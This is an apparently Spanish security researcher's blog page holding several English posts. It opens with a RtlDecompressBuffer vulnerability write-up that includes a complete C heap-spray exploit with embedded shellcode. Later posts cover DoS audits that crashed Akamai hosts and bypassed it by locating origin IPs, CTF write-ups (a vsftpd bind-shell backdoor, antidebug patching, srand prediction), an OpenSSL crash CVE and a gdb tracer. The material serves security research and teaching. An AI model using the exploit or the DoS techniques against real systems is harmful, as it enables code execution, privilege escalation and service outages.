domingo, noviembre 13, 2016

RtlDecompresBuffer vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:





int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector

This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

miércoles, octubre 12, 2016

Vulcan DoS vs Akamai

In the past I had to do several DoS security audits, with múltiples types of tests and intensities. Sometimes several DDoS protections were present like Akamai for static content, and Arbor for absorb part of the bandwith.

One consideration for the DoS/DDoS tools is that probably it will loss the control of the attacker host, and the tool at least has to be able to stop automatically with a timeout, but can also implement remote response checks.

In order to size the minimum mbps needed to flood a service or to retard the response in a significant amount of time, the attacker hosts need a bandwith limiter, that increments in a logarithmic way up to a limit agreed with the customer/isp/cpd.

There are DoS tools that doesn't have this timeouts, and bandwith limit based on mbps, for that reason I have to implement a LD_PRELOAD based solution: bwcontrol

Although there are several good tools for stressing web servers and web aplications like apache ab, or other common tools used for pen-testing, but I also wrote a fast web flooder in c++ named wflood.

As expected the most effective for taking down the web server are the slow-loris, slow-read and derivatives, few host were needed to DoS an online banking. 
Remote attacks to database and highly dynamic web content were discarded, that could be impacted for sure.

I did another tool in c++ for crafting massive tcp/udp/ip malformed packets, that impacted sometimes on load balancers and firewalls, it was vulcan, it freezed even the firewall client software.

The funny thing was that the common attacks against Akamai hosts, where ineffective, and so does the slow-loris family of attacks, because are common, and the Akamai nginx webservers are well tunned. But when tried vulcan, few intensity was enough to crash Akamai hosts.

Another attack vector for static sites was trying to locate the IP of the customer instead of Akamai, if the customer doesn't use the Akamai Shadow service, it's possible to perform a HTTP Host header scan, and direct the attack to that host bypassing Akamai.

And what about Arbor protection? is good for reducing the flood but there are other kind of attacks, and this protection use to be disabled by default and in local holidays can be a mess.

domingo, octubre 09, 2016

vsftpd backdoor - ekoparty prectf - am3s1a team

It's a 32bits elf binary of some version of vsftpd, where it have been added a backdoor, they don't specify is an authentication backdoor, a special command or other stuff.

I started looking for something weird on the authentication routines, but I didn't found anything significant in a brief period of time, so I decided to do a bindiff, that was the key for locating the backdoor quickly. I do a quick diff of the strings with the command "strings bin | sort -u" and "vimdiff" and noticed that the backdoored binary has the symbol "execl" which is weird because is a call for executing elfs, don't needed for a ftp service, and weird that the compiled binary doesn't has that symbol.





Looking the xrefs of "execl" on IDA I found that code that is a clear backdoor, it create a socket, bind a port and duplicate the stdin, stdout and stderr to the socket and use the execl:



There are one xrefs to this function, the function that decides when trigger that is that kind of systems equations decision:


The backdoor was not on the authentication, it was a special command to trigger the backdoor, which is obfuscated on that systems equation, it was no needed to use a z3 equation solver because is a simple one and I did it by hand.



The equation:
cmd[0] = 69
cmd[1] = 78
cmd[1] + cmd[2] = 154
cmd[2] + cmd[3] = 202
cmd[3] + cmd[4] = 241
cmd[4] + cmd[5] = 233
cmd[5] + cmd[6] = 217
cmd[6] + cmd[7] = 218
cmd[7] + cmd[8] = 228
cmd[8] + cmd[9] = 212
cmd[9] + cmd[10] = 195
cmd[10] + cmd[11] = 195
cmd[11] + cmd[12] = 201
cmd[12] + cmd[13] = 207
cmd[13] + cmd[14] = 203
cmd[14] + cmd[15] = 215
cmd[15] + cmd[16] = 235
cmd[16] + cmd[17] = 242

The solution:
cmd[0] = 69
cmd[1] = 75
cmd[2] = 79
cmd[3] = 123
cmd[4] = 118
cmd[5] = 115
cmd[6] = 102
cmd[7] = 116
cmd[8] = 112
cmd[9] = 100
cmd[10] = 95
cmd[11] = 100
cmd[12] = 101
cmd[13] = 106
cmd[14] = 97                    
cmd[15] = 118
cmd[16] = 117
cmd[17] = 125


The flag:
EKO{vsftpd_dejavu}

The binary:
https://ctf.ekoparty.org/static/pre-ekoparty/backdoor


lunes, diciembre 21, 2015

NcN 2015 CTF - theAnswer writeup


1. Overview

Is an elf32 static and stripped binary, but the good news is that it was compiled with gcc and it will not have shitty runtimes and libs to fingerprint, just the libc ... and libprhrhead
This binary is writed by Ricardo J Rodrigez

When it's executed, it seems that is computing the flag:


But this process never ends .... let's see what strace say:


There is a thread deadlock, maybe the start point can be looking in IDA the xrefs of 0x403a85
Maybe we can think about an encrypted flag that is not decrypting because of the lock.

This can be solved in two ways:

  • static: understanding the cryptosystem and programming our own decryptor
  • dynamic: fixing the the binary and running it (hard: antidebug, futex, rands ...)


At first sight I thought that dynamic approach were quicker, but it turned more complex than the static approach.


2. Static approach

Crawling the xrefs to the futex, it is possible to locate the main:



With libc/libpthread function fingerprinting or a bit of manual work, we have the symbols, here is the main, where 255 threads are created and joined, when the threads end, the xor key is calculated and it calls the print_flag:



The code of the thread is passed to the libc_pthread_create, IDA recognize this area as data but can be selected as code and function.

This is the thread code decompiled, where we can observe two infinite loops for ptrace detection and preload (although is static) this antidebug/antihook are easy to detect at this point.


we have to observe the important thing, is the key random?? well, with the same seed the random sequence will be the same, then the key is "hidden" in the predictability of the random.

If the threads are not executed on the creation order, the key will be wrong because is xored with the th_id which is the identify of current thread.

The print_key function, do the xor between the key and the flag_cyphertext byte by byte.


And here we have the seed and the first bytes of the cypher-text:



With radare we can convert this to a c variable quickly:


And here is the flag cyphertext:


And with some radare magics, we have the c initialized array:


radare, is full featured :)

With a bit of rand() calibration here is the solution ...



The code:
https://github.com/NocONName/CTF_NcN2k15/blob/master/theAnswer/solution.c





3. The Dynamic Approach

First we have to patch the anti-debugs, on beginning of the thread there is two evident anti-debugs (well anti preload hook and anti ptrace debugging) the infinite loop also makes the anti-debug more evident:



There are also a third anti-debug, a bit more silent, if detects a debugger trough the first available descriptor, and here comes the fucking part, don't crash the execution, the execution continues but the seed is modified a bit, then the decryption key will not be ok.





Ok, the seed is incremented by one, this could be a normal program feature, but this is only triggered if the fileno(open("/","r")) > 3 this is a well known anti-debug, that also can be seen from a traced execution.

Ok, just one byte patch,  seed+=1  to  seed+=0,   (add eax, 1   to add eax, 0)

before:


after:



To patch the two infinite loops, just nop the two bytes of each jmp $-0



Ok, but repairing this binary is harder than building a decryptor, we need to fix more things:

  •  The sleep(randInt(1,3)) of the beginning of the thread to execute the threads in the correct order
  •  Modify the pthread_cond_wait to avoid the futex()
  • We also need to calibrate de rand() to get the key (just patch the sleep and add other rand() before the pthread_create loop
Adding the extra rand() can be done with a patch because from gdb is not possible to make a call rand() in this binary.

With this modifications, the binary will print the key by itself. 

lunes, mayo 18, 2015

ASIS CTF Quals 2015 - sawthis writeup - srand remote prediction


The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Defcon 2015 coding skillz 1 writeup

Just connecting to the service, a 64bit cpu registers dump is received, and so does several binary code as you can see:



The registers represent an initial cpu state, and we have to reply with the registers result of the binary code execution. This must be automated becouse of the 10 seconds server socket timeout.

The exploit is quite simple, we have to set the cpu registers to this values, execute the code and get resulting registers.

In python we created two structures for the initial state and the ending state.

cpuRegs = {'rax':'','rbx':'','rcx':'','rdx':'','rsi':'','rdi':'','r8':'','r9':'','r10':'','r11':'','r12':'','r13':'','r14':'','r15':''}
finalRegs = {'rax':'','rbx':'','rcx':'','rdx':'','rsi':'','rdi':'','r8':'','r9':'','r10':'','r11':'','r12':'','r13':'','r14':'','r15':''}

We inject at the beginning several movs for setting the initial state:

for r in cpuRegs.keys():
    code.append('mov %s, %s' % (r, cpuRegs[r]))

The 64bit compilation of the movs and the binary code, but changing the last ret instruction by a sigtrap "int 3"
We compile with nasm in this way:

os.popen('nasm -f elf64 code.asm')
os.popen('ld -o code code.o ')

And use GDB to execute the code until the sigtrap, and then get the registers

fd = os.popen("gdb code -ex 'r' -ex 'i r' -ex 'quit'",'r')
for l in fd.readlines():
    for x in finalRegs.keys():
           ...

We just parse the registers and send the to the server in the same format, and got the key.


The code:

from libcookie import *
from asm import *
import os
import sys

host = 'catwestern_631d7907670909fc4df2defc13f2057c.quals.shallweplayaga.me'
port = 9999

cpuRegs = {'rax':'','rbx':'','rcx':'','rdx':'','rsi':'','rdi':'','r8':'','r9':'','r10':'','r11':'','r12':'','r13':'','r14':'','r15':''}
finalRegs = {'rax':'','rbx':'','rcx':'','rdx':'','rsi':'','rdi':'','r8':'','r9':'','r10':'','r11':'','r12':'','r13':'','r14':'','r15':''}
fregs = 15

s = Sock(TCP)
s.timeout = 999
s.connect(host,port)

data = s.readUntil('bytes:')


#data = s.read(sz)
#data = s.readAll()

sz = 0

for r in data.split('\n'):
    for rk in cpuRegs.keys():
        if r.startswith(rk):
            cpuRegs[rk] = r.split('=')[1]

    if 'bytes' in r:
        sz = int(r.split(' ')[3])



binary = data[-sz:]
code = []

print '[',binary,']'
print 'given size:',sz,'bin size:',len(binary)        
print cpuRegs


for r in cpuRegs.keys():
    code.append('mov %s, %s' % (r, cpuRegs[r]))


#print code

fd = open('code.asm','w')
fd.write('\n'.join(code)+'\n')
fd.close()
Capstone().dump('x86','64',binary,'code.asm')

print 'Compilando ...'
os.popen('nasm -f elf64 code.asm')
os.popen('ld -o code code.o ')

print 'Ejecutando ...'
fd = os.popen("gdb code -ex 'r' -ex 'i r' -ex 'quit'",'r')
for l in fd.readlines():
    for x in finalRegs.keys():
        if x in l:
            l = l.replace('\t',' ')
            try:
                i = 12
                spl = l.split(' ')
                if spl[i] == '':
                    i+=1
                print 'reg: ',x
                finalRegs[x] = l.split(' ')[i].split('\t')[0]
            except:
                print 'err: '+l
            fregs -= 1
            if fregs == 0:
                #print 'sending regs ...'
                #print finalRegs
                
                buff = []
                for k in finalRegs.keys():
                    buff.append('%s=%s' % (k,finalRegs[k]))


                print '\n'.join(buff)+'\n'

                print s.readAll()
                s.write('\n'.join(buff)+'\n\n\n')
                print 'waiting flag ....'
                print s.readAll()

                print '----- yeah? -----'
                s.close()
                



fd.close()
s.close()





lunes, marzo 30, 2015

TLS v1.2 sigalgs remote crash (CVE-2015-0291)


OpenSSL 1.0.2a fix several security issues, one of them let crash TLSv1.2 based services remotelly from internet.


Regarding to the TLSv1.2 RFC,  this version of TLS provides a "signature_algorithms" extension for the client_hello. 

Data Structures


If a bad signature is sent after the renegotiation, the structure will be corrupted, becouse structure pointer:
s->c->shared_sigalgs will be NULL, and the number of algorithms:
s->c->shared_sigalgslen will not be zeroed.
Which will be interpreted as one algorithm to process, but the pointer points to 0x00 address. 


Then tls1_process_sigalgs() will try to process one signature algorithm (becouse of shared_sigalgslen=1) then sigptr will be pointer to c->shared_sigalgs (NULL) and then will try to derreference sigptr->rhash. 


This mean a Segmentation Fault in  tls1_process_sigalgs() function, and called by tls1_set_server_sigalgs() with is called from ssl3_client_hello() as the stack trace shows.




StackTrace

The following code, points sigptr to null and try to read sigptr->rsign, which is assembled as movzbl eax,  byte ptr [0x0+R12] note in register window that R12 is 0x00

Debugger in the crash point.


radare2 static decompiled


The patch fix the vulnerability zeroing the sigalgslen.
Get  David A. Ramos' proof of concept exploit here





domingo, septiembre 21, 2014

S2 Dynamic tracer and decompiler for gdb

Decompiling is very useful for understanding srtipped binaries, most dissasemblers like IDA or Hopper have a plugin for decompiling binaries, generating a c like pseudocode.

Static analysis, is very useful in most of cases, specially when the binary is not so big, or when you just have an address where to start to analyze. But some algorithms will be learned in less time by dynamic analysis like tracing or debugging.

In cookiemonsters team, we are working on several tracers with different focus, but all of them mix the concept of tracing and decompiling to generate human-readable traces.

S2 is my tracer & decompiler plugin for gdb, very useful for ctfs.
Some of the features are:

- signed/unsigned detecion
- conditional pseudocode (if)
- syscall resolution
- unroll bucles
- used registers values
- mem states
- strings
- logging